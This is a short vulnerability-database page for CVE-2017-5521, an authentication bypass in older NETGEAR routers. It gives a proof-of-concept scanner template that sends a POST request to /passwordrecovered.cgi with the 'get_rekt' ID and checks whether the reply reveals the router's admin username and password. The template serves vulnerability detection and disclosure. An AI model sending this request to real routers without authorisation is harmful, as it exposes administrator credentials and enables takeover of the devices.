CVE-2017-5521: Bypassing Authentication on NETGEAR Routers

2025-08-01 NETGEAR Routers PoC Public

Description

NETGEAR routers before 6.0.10 allow remote attackers to bypass authentication and gain access to the router's administrative interface by using the get_rekt ID.

PoC

id: CVE-2017-5521

info:
  name: Bypassing Authentication on NETGEAR Routers
  author: betta
  severity: high
  description: |-
    NETGEAR routers before 6.0.10 allow remote attackers to bypass authentication and gain access to the router's administrative interface by using the get_rekt ID.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2017-5521
  tags: cve,cve2017,netgear,rce
  created: 2023/07/13

rules:
  r0:
    request:
      method: POST
      path: /passwordrecovered.cgi?id=get_rekt
    expression: response.status == 200 && "right\">Router\\s*Admin\\s*Username<".bmatches(response.body) && "right\">Router\\s*Admin\\s*Password<".bmatches(response.body) && response.body.bcontains(b"left")
expression: r0()

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities